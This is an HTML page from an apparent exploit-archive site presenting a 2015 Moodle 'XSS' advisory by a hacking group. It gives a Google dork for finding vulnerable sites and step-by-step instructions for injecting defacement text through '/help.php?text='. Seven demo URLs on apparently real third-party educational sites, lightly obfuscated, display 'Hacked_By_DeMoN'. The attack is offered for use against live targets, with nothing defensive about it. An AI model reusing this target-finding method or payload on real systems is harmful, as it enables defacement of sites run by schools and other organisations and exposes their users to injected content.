<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-50</title>
    </head>
    <body>
        <center>
                <a  href="exploit-50" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>
########################################################
# Exploit Title: Moodle cms/Cross Site Scripting(XSS)
########################################################
# Google Dork: inurl:/course/category.php?id=
# Date: [06/11/2015]
# Exploit Author: Guardiran Security Team =>DeMoN
# Vendor Homepage: [https://moodle.org/]
# Software Link: [-]
# Version: All Version
# Tested on: [Win 8.1/Google chrome]
# CVE : [-]
########################################################
# DISCRIPTION: Hello Guys.The First Enter The Dork In Google And Open The Target.
# Then Replace This Code
# [/help.php?text=hecked_text]
# Instead
# [/course/category.php?id=]
# And Replace Your Text Deface At [hecked_text] And You See That To Site Defaced With You.
########################################################
# Demo:
# http://moodle.jonfila.Xcom/help.php?text=Hacked_By_DeMoN
# http://elearning.noeXtic.org/help.php?text=Hacked_By_DeMoN
# http://nehacert.org/Xmoodle/help.php?text=Hacked_By_DeMoN
# http://dwmbeancoXunter.com/moodle/help.php?text=Hacked_By_DeMoN
# http://ipesvirtual.Xdfpd.edu.uy/help.php?text=Hacked_By_DeMoN
# http://clickandleXarn.bmgi.org/help.php?text=Hacked_By_DeMoN
# http://learnonlxine.health.nz/help.php?text=Hacked_By_DeMoN
########################################################
# Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T
# We Are Guardiran Security Team
# Discovered By:DeMoN
########################################################
        </pre>
    </body>
</html>